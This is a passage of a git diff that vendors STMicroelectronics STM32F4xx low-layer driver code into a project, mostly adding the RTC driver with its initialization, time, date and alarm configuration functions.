LL_AHB2_GRP1_ReleaseReset(LL_AHB2_GRP1_PERIPH_RNG); +#endif /* !RCC_AHB2_SUPPORT */ + return (SUCCESS); +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* RNG */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ + diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rtc.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rtc.c new file mode 100644 index 000000000..14c3cfa5c --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_rtc.c @@ -0,0 +1,865 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_rtc.c + * @author MCD Application Team + * @brief RTC LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_rtc.h" +#include "stm32f4xx_ll_cortex.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined(RTC) + +/** @addtogroup RTC_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @addtogroup RTC_LL_Private_Constants + * @{ + */ +/* Default values used for prescaler */ +#define RTC_ASYNCH_PRESC_DEFAULT 0x0000007FU +#define RTC_SYNCH_PRESC_DEFAULT 0x000000FFU + +/* Values used for timeout */ +#define RTC_INITMODE_TIMEOUT 1000U /* 1s when tick set to 1ms */ +#define RTC_SYNCHRO_TIMEOUT 1000U /* 1s when tick set to 1ms */ +/** + * @} + */ + +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup RTC_LL_Private_Macros + * @{ + */ + +#define IS_LL_RTC_HOURFORMAT(__VALUE__) (((__VALUE__) == LL_RTC_HOURFORMAT_24HOUR) \ + || ((__VALUE__) == LL_RTC_HOURFORMAT_AMPM)) + +#define IS_LL_RTC_ASYNCH_PREDIV(__VALUE__) ((__VALUE__) <= 0x7FU) + +#define IS_LL_RTC_SYNCH_PREDIV(__VALUE__) ((__VALUE__) <= 0x7FFFU) + +#define IS_LL_RTC_FORMAT(__VALUE__) (((__VALUE__) == LL_RTC_FORMAT_BIN) \ + || ((__VALUE__) == LL_RTC_FORMAT_BCD)) + +#define IS_LL_RTC_TIME_FORMAT(__VALUE__) (((__VALUE__) == LL_RTC_TIME_FORMAT_AM_OR_24) \ + || ((__VALUE__) == LL_RTC_TIME_FORMAT_PM)) + +#define IS_LL_RTC_HOUR12(__HOUR__) (((__HOUR__) > 0U) && ((__HOUR__) <= 12U)) +#define IS_LL_RTC_HOUR24(__HOUR__) ((__HOUR__) <= 23U) +#define IS_LL_RTC_MINUTES(__MINUTES__) ((__MINUTES__) <= 59U) +#define IS_LL_RTC_SECONDS(__SECONDS__) ((__SECONDS__) <= 59U) + +#define IS_LL_RTC_WEEKDAY(__VALUE__) (((__VALUE__) == LL_RTC_WEEKDAY_MONDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_TUESDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_WEDNESDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_THURSDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_FRIDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_SATURDAY) \ + || ((__VALUE__) == LL_RTC_WEEKDAY_SUNDAY)) + +#define IS_LL_RTC_DAY(__DAY__) (((__DAY__) >= 1U) && ((__DAY__) <= 31U)) + +#define IS_LL_RTC_MONTH(__MONTH__) (((__MONTH__) >= 1U) && ((__MONTH__) <= 12U)) + +#define IS_LL_RTC_YEAR(__YEAR__) ((__YEAR__) <= 99U) + +#define IS_LL_RTC_ALMA_MASK(__VALUE__) (((__VALUE__) == LL_RTC_ALMA_MASK_NONE) \ + || ((__VALUE__) == LL_RTC_ALMA_MASK_DATEWEEKDAY) \ + || ((__VALUE__) == LL_RTC_ALMA_MASK_HOURS) \ + || ((__VALUE__) == LL_RTC_ALMA_MASK_MINUTES) \ + || ((__VALUE__) == LL_RTC_ALMA_MASK_SECONDS) \ + || ((__VALUE__) == LL_RTC_ALMA_MASK_ALL)) + +#define IS_LL_RTC_ALMB_MASK(__VALUE__) (((__VALUE__) == LL_RTC_ALMB_MASK_NONE) \ + || ((__VALUE__) == LL_RTC_ALMB_MASK_DATEWEEKDAY) \ + || ((__VALUE__) == LL_RTC_ALMB_MASK_HOURS) \ + || ((__VALUE__) == LL_RTC_ALMB_MASK_MINUTES) \ + || ((__VALUE__) == LL_RTC_ALMB_MASK_SECONDS) \ + || ((__VALUE__) == LL_RTC_ALMB_MASK_ALL)) + + +#define IS_LL_RTC_ALMA_DATE_WEEKDAY_SEL(__SEL__) (((__SEL__) == LL_RTC_ALMA_DATEWEEKDAYSEL_DATE) || \ + ((__SEL__) == LL_RTC_ALMA_DATEWEEKDAYSEL_WEEKDAY)) + +#define IS_LL_RTC_ALMB_DATE_WEEKDAY_SEL(__SEL__) (((__SEL__) == LL_RTC_ALMB_DATEWEEKDAYSEL_DATE) || \ + ((__SEL__) == LL_RTC_ALMB_DATEWEEKDAYSEL_WEEKDAY)) + + +/** + * @} + */ +/* Private function prototypes -----------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup RTC_LL_Exported_Functions + * @{ + */ + +/** @addtogroup RTC_LL_EF_Init + * @{ + */ + +/** + * @brief De-Initializes the RTC registers to their default reset values. + * @note This function doesn't reset the RTC Clock source and RTC Backup Data + * registers. + * @param RTCx RTC Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC registers are de-initialized + * - ERROR: RTC registers are not de-initialized + */ +ErrorStatus LL_RTC_DeInit(RTC_TypeDef *RTCx) +{ + ErrorStatus status = ERROR; + + /* Check the parameter */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Set Initialization mode */ + if (LL_RTC_EnterInitMode(RTCx) != ERROR) + { + /* Reset TR, DR and CR registers */ + LL_RTC_WriteReg(RTCx, TR, 0x00000000U); +#if defined(RTC_WAKEUP_SUPPORT) + LL_RTC_WriteReg(RTCx, WUTR, RTC_WUTR_WUT); +#endif /* RTC_WAKEUP_SUPPORT */ + LL_RTC_WriteReg(RTCx, DR , (RTC_DR_WDU_0 | RTC_DR_MU_0 | RTC_DR_DU_0)); + /* Reset All CR bits except CR[2:0] */ +#if defined(RTC_WAKEUP_SUPPORT) + LL_RTC_WriteReg(RTCx, CR, (LL_RTC_ReadReg(RTCx, CR) & RTC_CR_WUCKSEL)); +#else + LL_RTC_WriteReg(RTCx, CR, 0x00000000U); +#endif /* RTC_WAKEUP_SUPPORT */ + LL_RTC_WriteReg(RTCx, PRER, (RTC_PRER_PREDIV_A | RTC_SYNCH_PRESC_DEFAULT)); + LL_RTC_WriteReg(RTCx, ALRMAR, 0x00000000U); + LL_RTC_WriteReg(RTCx, ALRMBR, 0x00000000U); + LL_RTC_WriteReg(RTCx, SHIFTR, 0x00000000U); + LL_RTC_WriteReg(RTCx, CALR, 0x00000000U); + LL_RTC_WriteReg(RTCx, ALRMASSR, 0x00000000U); + LL_RTC_WriteReg(RTCx, ALRMBSSR, 0x00000000U); + + /* Reset ISR register and exit initialization mode */ + LL_RTC_WriteReg(RTCx, ISR, 0x00000000U); + + /* Reset Tamper and alternate functions configuration register */ + LL_RTC_WriteReg(RTCx, TAFCR, 0x00000000U); + + /* Wait till the RTC RSF flag is set */ + status = LL_RTC_WaitForSynchro(RTCx); + } + + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return status; +} + +/** + * @brief Initializes the RTC registers according to the specified parameters + * in RTC_InitStruct. + * @param RTCx RTC Instance + * @param RTC_InitStruct pointer to a @ref LL_RTC_InitTypeDef structure that contains + * the configuration information for the RTC peripheral. + * @note The RTC Prescaler register is write protected and can be written in + * initialization mode only. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC registers are initialized + * - ERROR: RTC registers are not initialized + */ +ErrorStatus LL_RTC_Init(RTC_TypeDef *RTCx, LL_RTC_InitTypeDef *RTC_InitStruct) +{ + ErrorStatus status = ERROR; + + /* Check the parameters */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + assert_param(IS_LL_RTC_HOURFORMAT(RTC_InitStruct->HourFormat)); + assert_param(IS_LL_RTC_ASYNCH_PREDIV(RTC_InitStruct->AsynchPrescaler)); + assert_param(IS_LL_RTC_SYNCH_PREDIV(RTC_InitStruct->SynchPrescaler)); + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Set Initialization mode */ + if (LL_RTC_EnterInitMode(RTCx) != ERROR) + { + /* Set Hour Format */ + LL_RTC_SetHourFormat(RTCx, RTC_InitStruct->HourFormat); + + /* Configure Synchronous and Asynchronous prescaler factor */ + LL_RTC_SetSynchPrescaler(RTCx, RTC_InitStruct->SynchPrescaler); + LL_RTC_SetAsynchPrescaler(RTCx, RTC_InitStruct->AsynchPrescaler); + + /* Exit Initialization mode */ + LL_RTC_DisableInitMode(RTCx); + + status = SUCCESS; + } + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return status; +} + +/** + * @brief Set each @ref LL_RTC_InitTypeDef field to default value. + * @param RTC_InitStruct pointer to a @ref LL_RTC_InitTypeDef structure which will be initialized. + * @retval None + */ +void LL_RTC_StructInit(LL_RTC_InitTypeDef *RTC_InitStruct) +{ + /* Set RTC_InitStruct fields to default values */ + RTC_InitStruct->HourFormat = LL_RTC_HOURFORMAT_24HOUR; + RTC_InitStruct->AsynchPrescaler = RTC_ASYNCH_PRESC_DEFAULT; + RTC_InitStruct->SynchPrescaler = RTC_SYNCH_PRESC_DEFAULT; +} + +/** + * @brief Set the RTC current time. + * @param RTCx RTC Instance + * @param RTC_Format This parameter can be one of the following values: + * @arg @ref LL_RTC_FORMAT_BIN + * @arg @ref LL_RTC_FORMAT_BCD + * @param RTC_TimeStruct pointer to a RTC_TimeTypeDef structure that contains + * the time configuration information for the RTC. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC Time register is configured + * - ERROR: RTC Time register is not configured + */ +ErrorStatus LL_RTC_TIME_Init(RTC_TypeDef *RTCx, uint32_t RTC_Format, LL_RTC_TimeTypeDef *RTC_TimeStruct) +{ + ErrorStatus status = ERROR; + + /* Check the parameters */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + assert_param(IS_LL_RTC_FORMAT(RTC_Format)); + + if (RTC_Format == LL_RTC_FORMAT_BIN) + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(RTC_TimeStruct->Hours)); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_TimeStruct->TimeFormat)); + } + else + { + RTC_TimeStruct->TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(RTC_TimeStruct->Hours)); + } + assert_param(IS_LL_RTC_MINUTES(RTC_TimeStruct->Minutes)); + assert_param(IS_LL_RTC_SECONDS(RTC_TimeStruct->Seconds)); + } + else + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(__LL_RTC_CONVERT_BCD2BIN(RTC_TimeStruct->Hours))); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_TimeStruct->TimeFormat)); + } + else + { + RTC_TimeStruct->TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(__LL_RTC_CONVERT_BCD2BIN(RTC_TimeStruct->Hours))); + } + assert_param(IS_LL_RTC_MINUTES(__LL_RTC_CONVERT_BCD2BIN(RTC_TimeStruct->Minutes))); + assert_param(IS_LL_RTC_SECONDS(__LL_RTC_CONVERT_BCD2BIN(RTC_TimeStruct->Seconds))); + } + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Set Initialization mode */ + if (LL_RTC_EnterInitMode(RTCx) != ERROR) + { + /* Check the input parameters format */ + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_TIME_Config(RTCx, RTC_TimeStruct->TimeFormat, RTC_TimeStruct->Hours, + RTC_TimeStruct->Minutes, RTC_TimeStruct->Seconds); + } + else + { + LL_RTC_TIME_Config(RTCx, RTC_TimeStruct->TimeFormat, __LL_RTC_CONVERT_BIN2BCD(RTC_TimeStruct->Hours), + __LL_RTC_CONVERT_BIN2BCD(RTC_TimeStruct->Minutes), + __LL_RTC_CONVERT_BIN2BCD(RTC_TimeStruct->Seconds)); + } + + /* Exit Initialization mode */ + LL_RTC_DisableInitMode(RTCx); + + /* If RTC_CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if (LL_RTC_IsShadowRegBypassEnabled(RTCx) == 0U) + { + status = LL_RTC_WaitForSynchro(RTCx); + } + else + { + status = SUCCESS; + } + } + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return status; +} + +/** + * @brief Set each @ref LL_RTC_TimeTypeDef field to default value (Time = 00h:00min:00sec). + * @param RTC_TimeStruct pointer to a @ref LL_RTC_TimeTypeDef structure which will be initialized. + * @retval None + */ +void LL_RTC_TIME_StructInit(LL_RTC_TimeTypeDef *RTC_TimeStruct) +{ + /* Time = 00h:00min:00sec */ + RTC_TimeStruct->TimeFormat = LL_RTC_TIME_FORMAT_AM_OR_24; + RTC_TimeStruct->Hours = 0U; + RTC_TimeStruct->Minutes = 0U; + RTC_TimeStruct->Seconds = 0U; +} + +/** + * @brief Set the RTC current date. + * @param RTCx RTC Instance + * @param RTC_Format This parameter can be one of the following values: + * @arg @ref LL_RTC_FORMAT_BIN + * @arg @ref LL_RTC_FORMAT_BCD + * @param RTC_DateStruct pointer to a RTC_DateTypeDef structure that contains + * the date configuration information for the RTC. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: RTC Day register is configured + * - ERROR: RTC Day register is not configured + */ +ErrorStatus LL_RTC_DATE_Init(RTC_TypeDef *RTCx, uint32_t RTC_Format, LL_RTC_DateTypeDef *RTC_DateStruct) +{ + ErrorStatus status = ERROR; + + /* Check the parameters */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + assert_param(IS_LL_RTC_FORMAT(RTC_Format)); + + if ((RTC_Format == LL_RTC_FORMAT_BIN) && ((RTC_DateStruct->Month & 0x10U) == 0x10U)) + { + RTC_DateStruct->Month = (RTC_DateStruct->Month & (uint32_t)~(0x10U)) + 0x0AU; + } + if (RTC_Format == LL_RTC_FORMAT_BIN) + { + assert_param(IS_LL_RTC_YEAR(RTC_DateStruct->Year)); + assert_param(IS_LL_RTC_MONTH(RTC_DateStruct->Month)); + assert_param(IS_LL_RTC_DAY(RTC_DateStruct->Day)); + } + else + { + assert_param(IS_LL_RTC_YEAR(__LL_RTC_CONVERT_BCD2BIN(RTC_DateStruct->Year))); + assert_param(IS_LL_RTC_MONTH(__LL_RTC_CONVERT_BCD2BIN(RTC_DateStruct->Month))); + assert_param(IS_LL_RTC_DAY(__LL_RTC_CONVERT_BCD2BIN(RTC_DateStruct->Day))); + } + assert_param(IS_LL_RTC_WEEKDAY(RTC_DateStruct->WeekDay)); + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Set Initialization mode */ + if (LL_RTC_EnterInitMode(RTCx) != ERROR) + { + /* Check the input parameters format */ + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_DATE_Config(RTCx, RTC_DateStruct->WeekDay, RTC_DateStruct->Day, RTC_DateStruct->Month, RTC_DateStruct->Year); + } + else + { + LL_RTC_DATE_Config(RTCx, RTC_DateStruct->WeekDay, __LL_RTC_CONVERT_BIN2BCD(RTC_DateStruct->Day), + __LL_RTC_CONVERT_BIN2BCD(RTC_DateStruct->Month), __LL_RTC_CONVERT_BIN2BCD(RTC_DateStruct->Year)); + } + + /* Exit Initialization mode */ + LL_RTC_DisableInitMode(RTCx); + + /* If RTC_CR_BYPSHAD bit = 0, wait for synchro else this check is not needed */ + if (LL_RTC_IsShadowRegBypassEnabled(RTCx) == 0U) + { + status = LL_RTC_WaitForSynchro(RTCx); + } + else + { + status = SUCCESS; + } + } + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return status; +} + +/** + * @brief Set each @ref LL_RTC_DateTypeDef field to default value (date = Monday, January 01 xx00) + * @param RTC_DateStruct pointer to a @ref LL_RTC_DateTypeDef structure which will be initialized. + * @retval None + */ +void LL_RTC_DATE_StructInit(LL_RTC_DateTypeDef *RTC_DateStruct) +{ + /* Monday, January 01 xx00 */ + RTC_DateStruct->WeekDay = LL_RTC_WEEKDAY_MONDAY; + RTC_DateStruct->Day = 1U; + RTC_DateStruct->Month = LL_RTC_MONTH_JANUARY; + RTC_DateStruct->Year = 0U; +} + +/** + * @brief Set the RTC Alarm A. + * @note The Alarm register can only be written when the corresponding Alarm + * is disabled (Use @ref LL_RTC_ALMA_Disable function). + * @param RTCx RTC Instance + * @param RTC_Format This parameter can be one of the following values: + * @arg @ref LL_RTC_FORMAT_BIN + * @arg @ref LL_RTC_FORMAT_BCD + * @param RTC_AlarmStruct pointer to a @ref LL_RTC_AlarmTypeDef structure that + * contains the alarm configuration parameters. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ALARMA registers are configured + * - ERROR: ALARMA registers are not configured + */ +ErrorStatus LL_RTC_ALMA_Init(RTC_TypeDef *RTCx, uint32_t RTC_Format, LL_RTC_AlarmTypeDef *RTC_AlarmStruct) +{ + /* Check the parameters */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + assert_param(IS_LL_RTC_FORMAT(RTC_Format)); + assert_param(IS_LL_RTC_ALMA_MASK(RTC_AlarmStruct->AlarmMask)); + assert_param(IS_LL_RTC_ALMA_DATE_WEEKDAY_SEL(RTC_AlarmStruct->AlarmDateWeekDaySel)); + + if (RTC_Format == LL_RTC_FORMAT_BIN) + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(RTC_AlarmStruct->AlarmTime.Hours)); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_AlarmStruct->AlarmTime.TimeFormat)); + } + else + { + RTC_AlarmStruct->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(RTC_AlarmStruct->AlarmTime.Hours)); + } + assert_param(IS_LL_RTC_MINUTES(RTC_AlarmStruct->AlarmTime.Minutes)); + assert_param(IS_LL_RTC_SECONDS(RTC_AlarmStruct->AlarmTime.Seconds)); + + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMA_DATEWEEKDAYSEL_DATE) + { + assert_param(IS_LL_RTC_DAY(RTC_AlarmStruct->AlarmDateWeekDay)); + } + else + { + assert_param(IS_LL_RTC_WEEKDAY(RTC_AlarmStruct->AlarmDateWeekDay)); + } + } + else + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Hours))); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_AlarmStruct->AlarmTime.TimeFormat)); + } + else + { + RTC_AlarmStruct->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Hours))); + } + + assert_param(IS_LL_RTC_MINUTES(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Minutes))); + assert_param(IS_LL_RTC_SECONDS(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Seconds))); + + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMA_DATEWEEKDAYSEL_DATE) + { + assert_param(IS_LL_RTC_DAY(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmDateWeekDay))); + } + else + { + assert_param(IS_LL_RTC_WEEKDAY(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmDateWeekDay))); + } + } + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Select weekday selection */ + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMA_DATEWEEKDAYSEL_DATE) + { + /* Set the date for ALARM */ + LL_RTC_ALMA_DisableWeekday(RTCx); + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_ALMA_SetDay(RTCx, RTC_AlarmStruct->AlarmDateWeekDay); + } + else + { + LL_RTC_ALMA_SetDay(RTCx, __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmDateWeekDay)); + } + } + else + { + /* Set the week day for ALARM */ + LL_RTC_ALMA_EnableWeekday(RTCx); + LL_RTC_ALMA_SetWeekDay(RTCx, RTC_AlarmStruct->AlarmDateWeekDay); + } + + /* Configure the Alarm register */ + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_ALMA_ConfigTime(RTCx, RTC_AlarmStruct->AlarmTime.TimeFormat, RTC_AlarmStruct->AlarmTime.Hours, + RTC_AlarmStruct->AlarmTime.Minutes, RTC_AlarmStruct->AlarmTime.Seconds); + } + else + { + LL_RTC_ALMA_ConfigTime(RTCx, RTC_AlarmStruct->AlarmTime.TimeFormat, + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Hours), + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Minutes), + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Seconds)); + } + /* Set ALARM mask */ + LL_RTC_ALMA_SetMask(RTCx, RTC_AlarmStruct->AlarmMask); + + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return SUCCESS; +} + +/** + * @brief Set the RTC Alarm B. + * @note The Alarm register can only be written when the corresponding Alarm + * is disabled (@ref LL_RTC_ALMB_Disable function). + * @param RTCx RTC Instance + * @param RTC_Format This parameter can be one of the following values: + * @arg @ref LL_RTC_FORMAT_BIN + * @arg @ref LL_RTC_FORMAT_BCD + * @param RTC_AlarmStruct pointer to a @ref LL_RTC_AlarmTypeDef structure that + * contains the alarm configuration parameters. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: ALARMB registers are configured + * - ERROR: ALARMB registers are not configured + */ +ErrorStatus LL_RTC_ALMB_Init(RTC_TypeDef *RTCx, uint32_t RTC_Format, LL_RTC_AlarmTypeDef *RTC_AlarmStruct) +{ + /* Check the parameters */ + assert_param(IS_RTC_ALL_INSTANCE(RTCx)); + assert_param(IS_LL_RTC_FORMAT(RTC_Format)); + assert_param(IS_LL_RTC_ALMB_MASK(RTC_AlarmStruct->AlarmMask)); + assert_param(IS_LL_RTC_ALMB_DATE_WEEKDAY_SEL(RTC_AlarmStruct->AlarmDateWeekDaySel)); + + if (RTC_Format == LL_RTC_FORMAT_BIN) + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(RTC_AlarmStruct->AlarmTime.Hours)); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_AlarmStruct->AlarmTime.TimeFormat)); + } + else + { + RTC_AlarmStruct->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(RTC_AlarmStruct->AlarmTime.Hours)); + } + assert_param(IS_LL_RTC_MINUTES(RTC_AlarmStruct->AlarmTime.Minutes)); + assert_param(IS_LL_RTC_SECONDS(RTC_AlarmStruct->AlarmTime.Seconds)); + + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMB_DATEWEEKDAYSEL_DATE) + { + assert_param(IS_LL_RTC_DAY(RTC_AlarmStruct->AlarmDateWeekDay)); + } + else + { + assert_param(IS_LL_RTC_WEEKDAY(RTC_AlarmStruct->AlarmDateWeekDay)); + } + } + else + { + if (LL_RTC_GetHourFormat(RTCx) != LL_RTC_HOURFORMAT_24HOUR) + { + assert_param(IS_LL_RTC_HOUR12(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Hours))); + assert_param(IS_LL_RTC_TIME_FORMAT(RTC_AlarmStruct->AlarmTime.TimeFormat)); + } + else + { + RTC_AlarmStruct->AlarmTime.TimeFormat = 0x00U; + assert_param(IS_LL_RTC_HOUR24(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Hours))); + } + + assert_param(IS_LL_RTC_MINUTES(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Minutes))); + assert_param(IS_LL_RTC_SECONDS(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmTime.Seconds))); + + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMB_DATEWEEKDAYSEL_DATE) + { + assert_param(IS_LL_RTC_DAY(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmDateWeekDay))); + } + else + { + assert_param(IS_LL_RTC_WEEKDAY(__LL_RTC_CONVERT_BCD2BIN(RTC_AlarmStruct->AlarmDateWeekDay))); + } + } + + /* Disable the write protection for RTC registers */ + LL_RTC_DisableWriteProtection(RTCx); + + /* Select weekday selection */ + if (RTC_AlarmStruct->AlarmDateWeekDaySel == LL_RTC_ALMB_DATEWEEKDAYSEL_DATE) + { + /* Set the date for ALARM */ + LL_RTC_ALMB_DisableWeekday(RTCx); + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_ALMB_SetDay(RTCx, RTC_AlarmStruct->AlarmDateWeekDay); + } + else + { + LL_RTC_ALMB_SetDay(RTCx, __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmDateWeekDay)); + } + } + else + { + /* Set the week day for ALARM */ + LL_RTC_ALMB_EnableWeekday(RTCx); + LL_RTC_ALMB_SetWeekDay(RTCx, RTC_AlarmStruct->AlarmDateWeekDay); + } + + /* Configure the Alarm register */ + if (RTC_Format != LL_RTC_FORMAT_BIN) + { + LL_RTC_ALMB_ConfigTime(RTCx, RTC_AlarmStruct->AlarmTime.TimeFormat, RTC_AlarmStruct->AlarmTime.Hours, + RTC_AlarmStruct->AlarmTime.Minutes, RTC_AlarmStruct->AlarmTime.Seconds); + } + else + { + LL_RTC_ALMB_ConfigTime(RTCx, RTC_AlarmStruct->AlarmTime.TimeFormat, + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Hours), + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Minutes), + __LL_RTC_CONVERT_BIN2BCD(RTC_AlarmStruct->AlarmTime.Seconds)); + } + /* Set ALARM mask */ + LL_RTC_ALMB_SetMask(RTCx, RTC_AlarmStruct->AlarmMask); + + /* Enable the write protection for RTC registers */ + LL_RTC_EnableWriteProtection(RTCx); + + return SUCCESS; +} + +/** + * @brief Set each @ref LL_RTC_AlarmTypeDef of ALARMA field to default value (Time = 00h:00mn:00sec / + * Day = 1st day of the month/Mask = all fields are masked). + * @param RTC_AlarmStruct pointer to a @ref LL_RTC_AlarmTypeDef structure which will be initialized. + * @retval None + */ +void LL_RTC_ALMA_StructInit(LL_RTC_AlarmTypeDef *RTC_AlarmStruct) +{ + /* Alarm Time Settings : Time = 00h:00mn:00sec */ + RTC_AlarmStruct->AlarmTime.TimeFormat = LL_RTC_ALMA_TIME_FORMAT_AM; + RTC_AlarmStruct->AlarmTime.Hours = 0U; + RTC_AlarmStruct->AlarmTime.Minutes = 0U; + RTC_AlarmStruct->AlarmTime.Seconds = 0U; + + /* Alarm Day Settings : Day = 1st day of the month */ + RTC_AlarmStruct->AlarmDateWeekDaySel = LL_RTC_ALMA_DATEWEEKDAYSEL_DATE; + RTC_AlarmStruct->AlarmDateWeekDay = 1U; + + /* Alarm Masks Settings : Mask = all fields are not masked */ + RTC_AlarmStruct->AlarmMask = LL_RTC_ALMA_MASK_NONE; +} + +/** + * @brief Set each @ref LL_RTC_AlarmTypeDef of ALARMA field to default value (Time = 00h:00mn:00sec / + * Day = 1st day of the month/Mask = all fields are masked). + * @param RTC_AlarmStruct pointer to a @ref LL_RTC_AlarmTypeDef structure which will be initialized. + * @retval None + */ +void LL_RTC_ALMB_StructInit(LL_RTC_AlarmTypeDef *RTC_AlarmStruct) +{ + /* Alarm Time Settings : Time = 00h:00mn:00sec */ + RTC_AlarmStruct->AlarmTime.TimeFormat = LL_RTC_ALMB_TIME_FORMAT_AM; + RTC_AlarmStruct->AlarmTime.Hours = 0U; + RTC_AlarmStruct->AlarmTime.Minutes = 0U; + RTC_AlarmStruct->AlarmTime.Seconds = 0U; + + /* Alarm Day Settings : Day = 1st day of the month */ + RTC_AlarmStruct->AlarmDateWeekDaySel = LL_RTC_ALMB_DATEWEEKDAYSEL_DATE; + RTC_AlarmStruct->AlarmDateWeekDay = 1U; + + /* Alarm Masks 